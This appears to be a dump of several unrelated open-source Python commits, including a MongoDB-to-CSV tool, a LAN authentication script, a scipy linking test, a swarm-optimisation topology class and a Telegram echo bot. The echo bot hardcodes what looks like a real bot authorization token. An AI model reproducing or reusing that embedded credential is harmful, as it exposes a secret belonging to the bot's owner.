LLVM_REPO = os.path.join(REPO_BASE, "llvm")
LLVM_DATAFORMATTER_PATH = os.path.join(LLVM_REPO, "utils",
"lldbDataFormatters.py")
def import_llvm_dataformatters(debugger):
if not os.access(LLVM_DATAFORMATTER_PATH, os.F_OK):
print("WARNING! Could not find LLVM data formatters!")
return
cmd = 'command script import {}'.format(LLVM_DATAFORMATTER_PATH)
debugger.HandleCommand(cmd)
print("Loaded LLVM data formatters.")
def __lldb_init_module(debugger, internal_dict):
import_llvm_dataformatters(debugger)
| apache-2.0 | Python | |
e0db4982016a724c368feafbe4182016dc0fa67d | Create mongo_to_csv.py | rayidghani/database-utilities,rayidghani/database-utilities | mongo_to_csv.py | mongo_to_csv.py | import unicodecsv
import sys
from pymongo import MongoClient
# call this with 3 arguments: 1) mongodb uri 2) collection nam e3) output filename
class generic_converter:
def __init__(self):
self.header_dict = {}
def retrieve_headers(self, test_dict, name_var):
for element in test_dict:
if isinstance(test_dict[element], dict):
self.retrieve_headers(test_dict[element], name_var +
'||' + element)
else:
self.header_dict[name_var + '||' + element] = test_dict[element]
def converter_main(self, csv_writer):
mongo_uri_or_db_name = sys.argv[1]
if mongo_uri_or_db_name.startswith("mongodb://"): # mongodb uri given
client = MongoClient(mongo_uri_or_db_name)
db = client[mongo_uri_or_db_name.split("/")[-1]]
else: # database name given
client = MongoClient()
db = client[mongo_uri_or_db_name]
collection_obj = db[sys.argv[2]]
cursor_records = collection_obj.find()
header_list = []
for cursor in cursor_records:
self.retrieve_headers(cursor, '')
for item_label in self.header_dict:
if item_label not in header_list:
header_list.append(item_label)
self.header_dict = {}
csv_writer.writerow(header_list)
cursor_records = collection_obj.find()
for cursor in cursor_records:
row_to_push = []
self.header_dict = {}
self.retrieve_headers(cursor, '')
for item_label in header_list:
if item_label in self.header_dict:
row_to_push.append(self.header_dict[item_label])
else:
row_to_push.append('')
csv_writer.writerow(row_to_push)
def main():
f_write = open(sys.argv[3], 'wb')
csv_writer = unicodecsv.writer(f_write, delimiter=',', quotechar='"')
converter_object = generic_converter()
converter_object.converter_main(csv_writer)
if __name__ == '__main__':
main()
| mit | Python | |
f5c8f8d819143b4a49064847a6eb1a7813a3f06b | Create solution.py | lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges | hackerrank/algorithms/sorting/easy/closest_numbers/py/solution.py | hackerrank/algorithms/sorting/easy/closest_numbers/py/solution.py | #!/bin/python
size = int(raw_input())
values = sorted([int(value) for value in raw_input().split()][:size])
differences = sorted([(values[i - 1], values[i]) for i in range(1, len(values))], key = lambda x : abs(x[0] - x[1]))
i = 1
while (i < len(differences)
and abs(differences[i][0] - differences[i][1]) == abs(differences[i - 1][0] - differences[i - 1][1])):
i += 1
smallestDifferences = differences[:i]
print " ".join(" ".join(str(value) for value in difference) for difference in smallestDifferences)
| mit | Python | |
823bf93a9d931ed106ac4ed83f0448215c38580a | Create network_auth.py | MatthewLavine/NetworkAuth | network_auth.py | network_auth.py | #!/usr/bin/python
# Authenticates against a LAN using HTTP Basic Auth
import sys
if len(sys.argv) != 4:
print ("Invalid arguments")
print ("Proper syntax is: " + sys.argv[0] + " [url] [username] [password]")
sys.exit(1)
import requests
import requests.exceptions
auth_target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
print ("Checking connection to: " + auth_target)
try:
auth_check = requests.get(auth_target)
except requests.exceptions.ConnectionError as e:
print (e)
sys.exit(2)
except requests.exceptions.Timeout as e:
print (e)
sys.exit(3)
except Exception as e:
print (e)
sys.exit(98)
check_status = auth_check.status_code
print ("Response status code is: " + str(check_status))
if check_status == 200:
print ("You are already authenticated")
sys.exit(0)
print ("Authenticating...")
try:
do_auth = requests.get(auth_target, auth=(username, password))
except requests.exceptions.ConnectionError as e:
print (e)
sys.exit(4)
except requests.exceptions.Timeout as e:
print (e)
sys.exit(5)
except Exception as e:
print (e)
sys.exit(99)
auth_status = do_auth.status_code
if auth_status == 200:
print ("Authentication successful")
else:
print ("Authentication failed with response code: " + str(auth_status))
| mit | Python | |
0cad5e1673069d0fb8f2abb4eb6b062e3461fb70 | Add fortran ABI mismatch test for scipy.linalg. | mikebenfield/scipy,ChanderG/scipy,chatcannon/scipy,juliantaylor/scipy,newemailjdm/scipy,sonnyhu/scipy,WarrenWeckesser/scipy,mhogg/scipy,arokem/scipy,newemailjdm/scipy,FRidh/scipy,Eric89GXL/scipy,mgaitan/scipy,pschella/scipy,larsmans/scipy,anntzer/scipy,pizzathief/scipy,chatcannon/scipy,mortonjt/scipy,vigna/scipy,sriki18/scipy,scipy/scipy,sriki18/scipy,haudren/scipy,jamestwebber/scipy,niknow/scipy,tylerjereddy/scipy,maciejkula/scipy,ogrisel/scipy,fernand/scipy,josephcslater/scipy,ales-erjavec/scipy,josephcslater/scipy,dominicelse/scipy,ChanderG/scipy,ilayn/scipy,jor-/scipy,ilayn/scipy,aman-iitj/scipy,FRidh/scipy,vberaudi/scipy,larsmans/scipy,mortada/scipy,lukauskas/scipy,lukauskas/scipy,haudren/scipy,aman-iitj/scipy,futurulus/scipy,raoulbq/scipy,vanpact/scipy,zaxliu/scipy,scipy/scipy,e-q/scipy,vberaudi/scipy,matthewalbani/scipy,haudren/scipy,petebachant/scipy,dominicelse/scipy,nmayorov/scipy,maciejkula/scipy,person142/scipy,njwilson23/scipy,maciejkula/scipy,josephcslater/scipy,lhilt/scipy,ogrisel/scipy,felipebetancur/scipy,gertingold/scipy,niknow/scipy,aeklant/scipy,woodscn/scipy,rgommers/scipy,felipebetancur/scipy,newemailjdm/scipy,nvoron23/scipy,fredrikw/scipy,mdhaber/scipy,FRidh/scipy,njwilson23/scipy,Newman101/scipy,trankmichael/scipy,pnedunuri/scipy,maciejkula/scipy,mhogg/scipy,Shaswat27/scipy,anielsen001/scipy,grlee77/scipy,sonnyhu/scipy,mikebenfield/scipy,Srisai85/scipy,pyramania/scipy,bkendzior/scipy,jsilter/scipy,aarchiba/scipy,piyush0609/scipy,zxsted/scipy,hainm/scipy,trankmichael/scipy,person142/scipy,WarrenWeckesser/scipy,andyfaff/scipy,Srisai85/scipy,sonnyhu/scipy,person142/scipy,cpaulik/scipy,njwilson23/scipy,maniteja123/scipy,befelix/scipy,WillieMaddox/scipy,matthewalbani/scipy,zaxliu/scipy,trankmichael/scipy,petebachant/scipy,jjhelmus/scipy,argriffing/scipy,grlee77/scipy,argriffing/scipy,minhlongdo/scipy,pyramania/scipy,fredrikw/scipy,jseabold/scipy,rmcgibbo/scipy,jonycgn/scipy,vhaasteren/scipy,tylerjereddy/scipy,mdhaber/scipy,dch312/scipy,andyfaff/scipy,gertingold/scipy,Newman101/scipy,WarrenWeckesser/scipy,rmcgibbo/scipy,Shaswat27/scipy,vhaasteren/scipy,anntzer/scipy,haudren/scipy,jjhelmus/scipy,perimosocordiae/scipy,fernand/scipy,ndchorley/scipy,WillieMaddox/scipy,lukauskas/scipy,newemailjdm/scipy,aman-iitj/scipy,bkendzior/scipy,endolith/scipy,futurulus/scipy,Kamp9/scipy,mdhaber/scipy,larsmans/scipy,pizzathief/scipy,mortonjt/scipy,jamestwebber/scipy,teoliphant/scipy,zerothi/scipy,matthewalbani/scipy,richardotis/scipy,jseabold/scipy,ales-erjavec/scipy,mortada/scipy,arokem/scipy,kalvdans/scipy,jonycgn/scipy,aeklant/scipy,juliantaylor/scipy,arokem/scipy,giorgiop/scipy,jonycgn/scipy,arokem/scipy,Kamp9/scipy,fernand/scipy,Dapid/scipy,gertingold/scipy,bkendzior/scipy,nvoron23/scipy,Dapid/scipy,jsilter/scipy,vigna/scipy,jseabold/scipy,vhaasteren/scipy,pbrod/scipy,bkendzior/scipy,juliantaylor/scipy,mikebenfield/scipy,vigna/scipy,raoulbq/scipy,njwilson23/scipy,arokem/scipy,gfyoung/scipy,lukauskas/scipy,befelix/scipy,chatcannon/scipy,scipy/scipy,hainm/scipy,mortada/scipy,vanpact/scipy,mingwpy/scipy,scipy/scipy,ndchorley/scipy,zaxliu/scipy,cpaulik/scipy,vanpact/scipy,ilayn/scipy,haudren/scipy,mgaitan/scipy,pbrod/scipy,pbrod/scipy,Gillu13/scipy,rmcgibbo/scipy,vberaudi/scipy,fernand/scipy,lhilt/scipy,mgaitan/scipy,josephcslater/scipy,surhudm/scipy,mortada/scipy,Eric89GXL/scipy,aman-iitj/scipy,fernand/scipy,behzadnouri/scipy,WarrenWeckesser/scipy,maciejkula/scipy,ogrisel/scipy,kalvdans/scipy,futurulus/scipy,richardotis/scipy,ilayn/scipy,Dapid/scipy,anielsen001/scipy,juliantaylor/scipy,witcxc/scipy,felipebetancur/scipy,Eric89GXL/scipy,FRidh/scipy,tylerjereddy/scipy,ales-erjavec/scipy,minhlongdo/scipy,newemailjdm/scipy,endolith/scipy,endolith/scipy,nvoron23/scipy,petebachant/scipy,kleskjr/scipy,larsmans/scipy,kalvdans/scipy,fredrikw/scipy,minhlongdo/scipy,efiring/scipy,larsmans/scipy,sriki18/scipy,Newman101/scipy,pnedunuri/scipy,zaxliu/scipy,pbrod/scipy,lhilt/scipy,Dapid/scipy,cpaulik/scipy,felipebetancur/scipy,argriffing/scipy,mgaitan/scipy,Eric89GXL/scipy,teoliphant/scipy,gertingold/scipy,efiring/scipy,mingwpy/scipy,aeklant/scipy,jseabold/scipy,mortada/scipy,surhudm/scipy,mortonjt/scipy,nonhermitian/scipy,ilayn/scipy,gef756/scipy,chatcannon/scipy,jonycgn/scipy,fredrikw/scipy,jsilter/scipy,aarchiba/scipy,jseabold/scipy,Newman101/scipy,apbard/scipy,vberaudi/scipy,richardotis/scipy,maniteja123/scipy,josephcslater/scipy,gdooper/scipy,rgommers/scipy,piyush0609/scipy,andim/scipy,surhudm/scipy,sargas/scipy,aarchiba/scipy,efiring/scipy,nmayorov/scipy,cpaulik/scipy,matthewalbani/scipy,Shaswat27/scipy,nmayorov/scipy,person142/scipy,mhogg/scipy,gef756/scipy,felipebetancur/scipy,raoulbq/scipy,mgaitan/scipy,Stefan-Endres/scipy,Stefan-Endres/scipy,behzadnouri/scipy,mortonjt/scipy,hainm/scipy,ChanderG/scipy,Gillu13/scipy,fredrikw/scipy,zerothi/scipy,Kamp9/scipy,vhaasteren/scipy,witcxc/scipy,woodscn/scipy,Stefan-Endres/scipy,teoliphant/scipy,vanpact/scipy,Kamp9/scipy,rgommers/scipy,sauliusl/scipy,endolith/scipy,e-q/scipy,sargas/scipy,petebachant/scipy,jakevdp/scipy,surhudm/scipy,rgommers/scipy,kleskjr/scipy,jonycgn/scipy,anntzer/scipy,nvoron23/scipy,aeklant/scipy,hainm/scipy,jonycgn/scipy,e-q/scipy,zxsted/scipy,behzadnouri/scipy,richardotis/scipy,sargas/scipy,lukauskas/scipy,teoliphant/scipy,woodscn/scipy,grlee77/scipy,sriki18/scipy,gef756/scipy,scipy/scipy,pnedunuri/scipy,gef756/scipy,aarchiba/scipy,gfyoung/scipy,zxsted/scipy,ortylp/scipy,ortylp/scipy,zaxliu/scipy,efiring/scipy,gdooper/scipy,matthew-brett/scipy,futurulus/scipy,minhlongdo/scipy,Gillu13/scipy,nonhermitian/scipy,vberaudi/scipy,raoulbq/scipy,maniteja123/scipy,sargas/scipy,fernand/scipy,andim/scipy,felipebetancur/scipy,perimosocordiae/scipy,matthew-brett/scipy,sonnyhu/scipy,rmcgibbo/scipy,pyramania/scipy,giorgiop/scipy,dominicelse/scipy,apbard/scipy,nonhermitian/scipy,niknow/scipy,ortylp/scipy,WillieMaddox/scipy,pizzathief/scipy,mtrbean/scipy,witcxc/scipy,argriffing/scipy,apbard/scipy,matthew-brett/scipy,sauliusl/scipy,mhogg/scipy,Stefan-Endres/scipy,mdhaber/scipy,WarrenWeckesser/scipy,behzadnouri/scipy,endolith/scipy,grlee77/scipy,raoulbq/scipy,niknow/scipy,befelix/scipy,mingwpy/scipy,zxsted/scipy,FRidh/scipy,mingwpy/scipy,anielsen001/scipy,dominicelse/scipy,e-q/scipy,jor-/scipy,ndchorley/scipy,andyfaff/scipy,Shaswat27/scipy,sonnyhu/scipy,lhilt/scipy,sriki18/scipy,pizzathief/scipy,andim/scipy,WarrenWeckesser/scipy,pyramania/scipy,anielsen001/scipy,mhogg/scipy,sauliusl/scipy,sauliusl/scipy,sargas/scipy,anielsen001/scipy,kalvdans/scipy,mingwpy/scipy,aarchiba/scipy,Srisai85/scipy,minhlongdo/scipy,anntzer/scipy,rmcgibbo/scipy,chatcannon/scipy,rmcgibbo/scipy,e-q/scipy,ortylp/scipy,mdhaber/scipy,mgaitan/scipy,zxsted/scipy,ortylp/scipy,futurulus/scipy,niknow/scipy,argriffing/scipy,andim/scipy,hainm/scipy,person142/scipy,giorgiop/scipy,mtrbean/scipy,surhudm/scipy,Gillu13/scipy,pnedunuri/scipy,jakevdp/scipy,mtrbean/scipy,gef756/scipy,tylerjereddy/scipy,FRidh/scipy,juliantaylor/scipy,mtrbean/scipy,mortonjt/scipy,vhaasteren/scipy,trankmichael/scipy,nvoron23/scipy,Eric89GXL/scipy,jseabold/scipy,haudren/scipy,zerothi/scipy,Gillu13/scipy,pschella/scipy,vigna/scipy,mdhaber/scipy,lhilt/scipy,ales-erjavec/scipy,ales-erjavec/scipy,mortada/scipy,nonhermitian/scipy,jamestwebber/scipy,andyfaff/scipy,matthew-brett/scipy,cpaulik/scipy,andyfaff/scipy,vanpact/scipy,argriffing/scipy,zxsted/scipy,gfyoung/scipy,dch312/scipy,Newman101/scipy,aeklant/scipy,sriki18/scipy,nvoron23/scipy,hainm/scipy,anntzer/scipy,perimosocordiae/scipy,behzadnouri/scipy,sonnyhu/scipy,gdooper/scipy,Stefan-Endres/scipy,woodscn/scipy,apbard/scipy,jjhelmus/scipy,futurulus/scipy,WillieMaddox/scipy,njwilson23/scipy,befelix/scipy,efiring/scipy,kalvdans/scipy,kleskjr/scipy,dominicelse/scipy,befelix/scipy,Gillu13/scipy,surhudm/scipy,ortylp/scipy,teoliphant/scipy,sauliusl/scipy,Dapid/scipy,jakevdp/scipy,mtrbean/scipy,kleskjr/scipy,Srisai85/scipy,piyush0609/scipy,jamestwebber/scipy,Srisai85/scipy,Stefan-Endres/scipy,andyfaff/scipy,ales-erjavec/scipy,ChanderG/scipy,niknow/scipy,bkendzior/scipy,pbrod/scipy,richardotis/scipy,ndchorley/scipy,scipy/scipy,ChanderG/scipy,pnedunuri/scipy,jor-/scipy,jsilter/scipy,andim/scipy,ogrisel/scipy,jor-/scipy,giorgiop/scipy,maniteja123/scipy,mikebenfield/scipy,dch312/scipy,dch312/scipy,Srisai85/scipy,lukauskas/scipy,matthewalbani/scipy,zerothi/scipy,mikebenfield/scipy,maniteja123/scipy,gdooper/scipy,ndchorley/scipy,kleskjr/scipy,vhaasteren/scipy,nmayorov/scipy,mortonjt/scipy,richardotis/scipy,pschella/scipy,larsmans/scipy,vberaudi/scipy,jsilter/scipy,minhlongdo/scipy,perimosocordiae/scipy,pschella/scipy,nmayorov/scipy,Eric89GXL/scipy,Shaswat27/scipy,trankmichael/scipy,vanpact/scipy,nonhermitian/scipy,jjhelmus/scipy,andim/scipy,anielsen001/scipy,piyush0609/scipy,behzadnouri/scipy,Dapid/scipy,zerothi/scipy,ogrisel/scipy,jakevdp/scipy,apbard/scipy,tylerjereddy/scipy,mtrbean/scipy,woodscn/scipy,fredrikw/scipy,petebachant/scipy,woodscn/scipy,jor-/scipy,gertingold/scipy,ilayn/scipy,matthew-brett/scipy,ChanderG/scipy,giorgiop/scipy,perimosocordiae/scipy,jjhelmus/scipy,kleskjr/scipy,witcxc/scipy,zerothi/scipy,gfyoung/scipy,Newman101/scipy,sauliusl/scipy,endolith/scipy,raoulbq/scipy,perimosocordiae/scipy,ndchorley/scipy,mhogg/scipy,anntzer/scipy,piyush0609/scipy,aman-iitj/scipy,mingwpy/scipy,pizzathief/scipy,gef756/scipy,jakevdp/scipy,chatcannon/scipy,pyramania/scipy,dch312/scipy,njwilson23/scipy,witcxc/scipy,Shaswat27/scipy,cpaulik/scipy,gdooper/scipy,trankmichael/scipy,pbrod/scipy,pnedunuri/scipy,pschella/scipy,vigna/scipy,rgommers/scipy,WillieMaddox/scipy,piyush0609/scipy,gfyoung/scipy,WillieMaddox/scipy,giorgiop/scipy,aman-iitj/scipy,maniteja123/scipy,Kamp9/scipy,grlee77/scipy,jamestwebber/scipy,petebachant/scipy,zaxliu/scipy,efiring/scipy,Kamp9/scipy,newemailjdm/scipy | scipy/linalg/tests/test_build.py | scipy/linalg/tests/test_build.py | from subprocess import call, PIPE, Popen
import sys
import re
import numpy as np
from numpy.testing import TestCase, dec
from scipy.linalg import flapack
# XXX: this is copied from numpy trunk. Can be removed when we will depend on
# numpy 1.3
class FindDependenciesLdd:
def __init__(self):
self.cmd = ['ldd']
try:
st = call(self.cmd, stdout=PIPE, stderr=PIPE)
except OSError:
raise RuntimeError("command %s cannot be run" % self.cmd)
def get_dependencies(self, file):
p = Popen(self.cmd + [file], stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
if not (p.returncode == 0):
raise RuntimeError("Failed to check dependencies for %s" % libfile)
return stdout
def grep_dependencies(self, file, deps):
stdout = self.get_dependencies(file)
rdeps = dict([(dep, re.compile(dep)) for dep in deps])
founds = []
for l in stdout.splitlines():
for k, v in rdeps.items():
if v.search(l):
founds.append(k)
return founds
class TestF77Mismatch(TestCase):
@dec.skipif(not(sys.platform[:5] == 'linux'),
"Skipping fortran compiler mismatch on non Linux platform")
def test_lapack(self):
f = FindDependenciesLdd()
deps = f.grep_dependencies(flapack.__file__,
['libg2c', 'libgfortran'])
self.failIf(len(deps) > 1,
"""Both g77 and gfortran runtimes linked in lapack_lite ! This is likely to
cause random crashes and wrong results. See numpy INSTALL.txt for more
information.""")
| bsd-3-clause | Python | |
6e1c43015beae6afbc7b351d19aa1d899678ca44 | Add Star class topology | ljvmiranda921/pyswarms,ljvmiranda921/pyswarms | pyswarms/backend/topology/star.py | pyswarms/backend/topology/star.py | # -*- coding: utf-8 -*-
"""
A Star Network Topology
This class implements a star topology where all particles are connected to
one another. This social behavior is often found in GlobalBest PSO
optimizers.
"""
# Import from stdlib
import logging
# Import modules
import numpy as np
# Import from package
from .. import operators as ops
from .base import Topology
# Create a logger
logger = logging.getLogger(__name__)
class Star(Topology):
def __init__(self):
super(Star, self).__init__()
def compute_gbest(self, swarm):
"""Obtains the global best cost and position based on a star topology
This method takes the current pbest_pos and pbest_cost, then returns
the minimum cost and position from the matrix. It should be used in
tandem with an if statement
.. code-block:: python
import pyswarms.backend as P
from pyswarms.backend.swarms import Swarm
from pyswarm.backend.topology import Star
my_swarm = P.create_swarm(n_particles, dimensions)
my_topology = Star()
# If the minima of the pbest_cost is less than the best_cost
if np.min(pbest_cost) < best_cost:
# Update best_cost and position
swarm.best_pos, swarm.best_cost = my_topology.compute_best_particle(my_swarm)
Parameters
----------
swarm : pyswarms.backend.swarm.Swarm
a Swarm instance
Returns
-------
numpy.ndarray
Best position of shape :code:`(n_dimensions, )`
float
Best cost
"""
try:
best_pos = swarm.pbest_pos[np.argmin(swarm.pbest_cost)]
best_cost = np.min(swarm.pbest_cost)
except AttributeError:
msg = 'Please pass a Swarm class. You passed {}'.format(type(swarm))
logger.error(msg)
raise
else:
return (best_pos, best_cost)
def compute_velocity(self, swarm, clamp):
"""Computes the velocity matrix
This method updates the velocity matrix using the best and current
positions of the swarm. The velocity matrix is computed using the
cognitive and social terms of the swarm.
A sample usage can be seen with the following:
.. code-block :: python
import pyswarms.backend as P
from pyswarms.swarms.backend import Swarm
from pyswarms.backend.topology import Star
my_swarm = P.create_swarm(n_particles, dimensions)
my_topology = Star()
for i in range(iters):
# Inside the for-loop
my_swarm.velocity = my_topology.update_velocity(my_swarm, clamp)
Parameters
----------
swarm : pyswarms.backend.swarms.Swarm
a Swarm instance
clamp : tuple of floats (default is :code:`None`)
a tuple of size 2 where the first entry is the minimum velocity
and the second entry is the maximum velocity. It
sets the limits for velocity clamping.
Returns
-------
numpy.ndarray
Updated velocity matrix
"""
return ops.compute_velocity(swarm, clamp)
def compute_position(self, swarm, bounds):
"""Updates the position matrix
This method updates the position matrix given the current position and
the velocity. If bounded, it waives updating the position.
Parameters
----------
swarm : pyswarms.backend.swarms.Swarm
a Swarm instance
bounds : tuple of :code:`np.ndarray` or list (default is :code:`None`)
a tuple of size 2 where the first entry is the minimum bound while
the second entry is the maximum bound. Each array must be of shape
:code:`(dimensions,)`.
Returns
-------
numpy.ndarray
New position-matrix
"""
return ops.compute_position(swarm, bounds) | mit | Python | |
096a1d94c2f54246d51954b59fc5c3fdb28154b2 | add persistence strategy enum | keenlabs/KeenClient-Python,isotoma/KeenClient-Python,ruleant/KeenClient-Python | keen/__init__.py | keen/__init__.py | __author__ = 'dkador'
class PersistenceStrategy:
"""
An enum that defines the persistence strategy used by the KeenClient.
Currently supported: DIRECT, which means any time add_event is called the
client will call out directly to Keen, or REDIS, which means add_event
will simply add the event to a defined Redis instance which can be
cleared later.
"""
DIRECT = 0,
REDIS = 1 | __author__ = 'dkador'
| mit | Python |
295dc1e11563350181558001366275369df90639 | Add a sysutil module | sahg/SAHGutils | sahgutils/sysutil.py | sahgutils/sysutil.py | # System utility functions
from subprocess import Popen, PIPE
def exec_command(cmd_args):
"""Execute a shell command in a subprocess
Convenience wrapper around subprocess to execute a shell command
and pass back stdout, stderr, and the return code. This function
waits for the subprocess to complete, before returning.
Usage example:
>>> stdout, stderr, retcode = exec_command(['ls', '-lhot'])
Parameters
----------
cmd_args : list of strings
The args to pass to subprocess. The first arg is the program
name.
Returns
-------
stdout : string
The contents of stdout produced by the shell command
stderr : string
The contents of stderr produced by the shell command
retcode : int
The return code produced by the shell command
"""
proc = Popen(cmd_args, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
proc.wait()
return stdout, stderr, proc.returncode
| bsd-3-clause | Python | |
74034ccc6d1b7436c81520fb287330b852d54c62 | Create a.py | cliali/py2 | a.py | a.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Simple Bot to reply to Telegram messages. This is built on the API wrapper, see
# echobot2.py to see the same example built on the telegram.ext bot framework.
# This program is dedicated to the public domain under the CC0 license.
import logging
import telegram
from telegram.error import NetworkError, Unauthorized
from time import sleep
update_id = None
def main():
global update_id
# Telegram Bot Authorization Token
bot = telegram.Bot('277679081:AAGk3IXlId9PKUn3n_5wrfrUIR_mgsUVCeE')
# get the first pending update_id, this is so we can skip over it in case
# we get an "Unauthorized" exception.
try:
update_id = bot.getUpdates()[0].update_id
except IndexError:
update_id = None
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
while True:
try:
echo(bot)
except NetworkError:
sleep(1)
except Unauthorized:
# The user has removed or blocked the bot.
update_id += 1
def echo(bot):
global update_id
# Request updates after the last update_id
for update in bot.getUpdates(offset=update_id, timeout=10):
# chat_id is required to reply to any message
chat_id = update.message.chat_id
update_id = update.update_id + 1
if update.message: # your bot can receive updates without messages
# Reply to the message
update.message.reply_text(update.message.text)
if __name__ == '__main__':
main()
| apache-2.0 | Python | |
e2dbee01734a981e8fcbbdca7d7d96f0506f929b | Create b.py | ayst123/mooc,ayst123/mooc | b.py | b.py | b = 43
| bsd-2-clause | Python | |
ef7b6fb0bbe0c0d263a8c28ccaed1365f50f0ad9 | Solve Knowit2019/07 | matslindh/codingchallenges,matslindh/codingchallenges | knowit2019/07.py | knowit2019/07.py | def zee_special_divison_operator(exp_r, x):
for y_d in range(2, 27644437):
b = y_d * x
r = b % 27644437
if exp_r == r:
break
return y_d
def test_special():
assert 13825167 == zee_special_divison_operator(5897, 2)
assert 9216778 == zee_special_divison_operator(5897, 3)
assert 20734802 == zee_special_divison_operator(5897, 4)
if __name__ == '__main__':
print(zee_special_divison_operator(5897, 7)) | mit | Python | |
e61dbf66d6f73e4999a5ff9f732a8df0637fdbf2 | Add an example of SQLalchemy model | raspberrywhite/raspberrywhite,raspberrywhite/raspberrywhite,raspberrywhite/raspberrywhite,raspberrywhite/raspberrywhite | server/models.py | server/models.py | from flask.ext.sqlalchemy import SQLAlchemy
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
def __init__(self, username, email):
self.username = username
self.email = email
def __repr__(self):
return '<User %r>' % self.username
| bsd-3-clause | Python | |
b6fb4cadb9ac1506fef3a230ee7ec983daa64922 | Remove tail | monouno/site,Phoenix1369/site,monouno/site,monouno/site,Minkov/site,DMOJ/site,DMOJ/site,Minkov/site,Minkov/site,DMOJ/site,Phoenix1369/site,monouno/site,Phoenix1369/site,Phoenix1369/site,monouno/site,DMOJ/site,Minkov/site | judge/templatetags/markdown/lazy_load.py | judge/templatetags/markdown/lazy_load.py | from copy import deepcopy
from django.contrib.staticfiles.templatetags.staticfiles import static
from lxml import html
def lazy_load(tree):
blank = static('blank.gif')
for img in tree.xpath('.//img'):
src = img.get('src')
if src.startswith('data'):
continue
noscript = html.Element('noscript')
copy = deepcopy(img)
copy.tail = ''
noscript.append(copy)
img.addprevious(noscript)
img.set('data-src', src)
img.set('src', blank)
img.set('class', img.get('class') + ' unveil' if img.get('class') else 'unveil')
| from copy import deepcopy
from django.contrib.staticfiles.templatetags.staticfiles import static
from lxml import html
def lazy_load(tree):
blank = static('blank.gif')
for img in tree.xpath('.//img'):
src = img.get('src')
if src.startswith('data'):
continue
noscript = html.Element('noscript')
noscript.append(deepcopy(img))
img.addprevious(noscript)
img.set('data-src', src)
img.set('src', blank)
img.set('class', img.get('class') + ' unveil' if img.get('class') else 'unveil')
| agpl-3.0 | Python |
eb145b78d4c84a29ee77fbe77142dee6f97f67dd | put urls and getter in its own file | apetrynet/filemail,apetrynet/pyfilemail,apetrynet/filemail | filemail/urls.py | filemail/urls.py | import os
from errors import FMConfigError
base_url = 'https://www.filemail.com'
api_urls = {
'login': 'api/authentication/login',
'logout': 'api/authentication/logout',
'init': 'api/transfer/initialize',
'get': 'api/transfer/get',
'complete': 'api/transfer/complete',
'forward': 'api/transfer/forward',
'share': 'api/transfer/share',
'cancel': 'api/transfer/cancel',
'delete': 'api/transfer/delete',
'zip': 'api/transfer/zip',
'file_rename': 'api/transfer/file/rename',
'file_delete': 'api/transfer/file/delete',
'update': 'api/transfer/update',
'sent_get': 'api/transfer/sent/get',
'received_get': 'api/transfer/received/get',
'user_get': 'api/user/get',
'user_update': 'api/user/update'
}
def getURL(action):
if action in api_urls:
url = os.path.join(base_url, api_urls[action])
return url
raise FMConfigError('You passed an invalid action: {}'.format(action))
| mit | Python | |
beb549ba090a1a72761a7e81feb3edcbf85ca543 | Add files via upload | yawatauma/hello-world | first_attempt.py | first_attempt.py | print("Hello world")
| mit | Python | |
036601c8172dc71f2ea106abdae9a157a8e60855 | update find best results | duguyue100/rolling | scripts/find-best.py | scripts/find-best.py | """
Find the best result from experiments.
Author: Yuhuang Hu
Email : duguyue100@gmail.com
"""
import sys;
import os;
from numba.cuda.cudadrv.nvvm import RESULT_CODE_NAMES
sys.path.append("..");
import argparse;
import cPickle as pickle;
import numpy as np;
import rolling.dataset as ds;
import rolling.draw as draw;
def search(results_path, network_type, batch_size, num_epochs):
"""
Find all available results available in results destination
Parameters
----------
results_path : string
destination of experiment results
network_type : string
feedforward or RNN
batch_size : string
batch size for each mini-batch samples
num_epochs : string
total number of training epochs
Returns
-------
result_lit : List
a list of relevant result files
"""
all_layers=xrange(1,6);
all_neurons=xrange(10, 305, 5);
all_methods=["sgd", "momentum", "adagrad", "rmsprop"];
all_regularization=["dropout", "l2"];
result_list=[];
for n_layers in all_layers:
for n_neurons in all_neurons:
for method in all_methods:
for regular in all_regularization:
exp_id=ds.create_exp_id(network_type, n_layers, n_neurons,
batch_size, num_epochs, method, regular);
if os.path.exists(results_path+exp_id+".pkl"):
with open(results_path+exp_id+".pkl", 'r') as f:
result_list.append(pickle.load(f));
return result_list;
def analysis(results_path, network_type, batch_size, num_epochs):
"""
Find the best result from rolling experiment results
Parameters
----------
results_path : string
destination of the results
network_type : string
feedforward or RNN
batch_size : string
batch size for each mini-batch samples
num_epochs : string
total number of training epochs
Returns
-------
best_id : string
Identifier of best result
"""
result_list=search(results_path, network_type, batch_size, num_epochs);
best_result=result_list[0];
worst_result=result_list[0];
for i in xrange(1, len(result_list)):
temp_result=result_list[i];
if np.min(temp_result['cost'][1,:])<np.min(best_result['cost'][1,:]):
best_result=temp_result;
elif np.min(temp_result['cost'][1,:])>np.min(best_result['cost'][1,:]):
worst_result=temp_result;
best_tr_cost=np.min(best_result['cost'][0,:]);
best_tr_epoch=np.argmin(best_result['cost'][0,:]);
best_te_cost=np.min(best_result['cost'][1,:]);
best_te_epoch=np.argmin(best_result['cost'][1,:]);
worst_tr_cost=np.min(worst_result['cost'][0,:]);
worst_tr_epoch=np.argmin(worst_result['cost'][0,:]);
worst_te_cost=np.min(worst_result['cost'][1,:]);
worst_te_epoch=np.argmin(worst_result['cost'][1,:]);
print "-----------------------------------------------------------------------";
print "-----------------------------------------------------------------------";
print "Best result experiment ID: %s" % (best_result['exp_id']);
print "Best result training cost %f in epoch %d" % (best_tr_cost, best_tr_epoch);
print "Best result testing cost %f in epoch %d" % (best_te_cost, best_te_epoch);
print "-----------------------------------------------------------------------";
print "-----------------------------------------------------------------------";
print "Worst result experiment ID: %s" % (worst_result['exp_id']);
print "Worst result training cost %f in epoch %d" % (worst_tr_cost, worst_tr_epoch);
print "Worst result testing cost %f in epoch %d" % (worst_te_cost, worst_te_epoch);
print "-----------------------------------------------------------------------";
print "-----------------------------------------------------------------------";
return ;
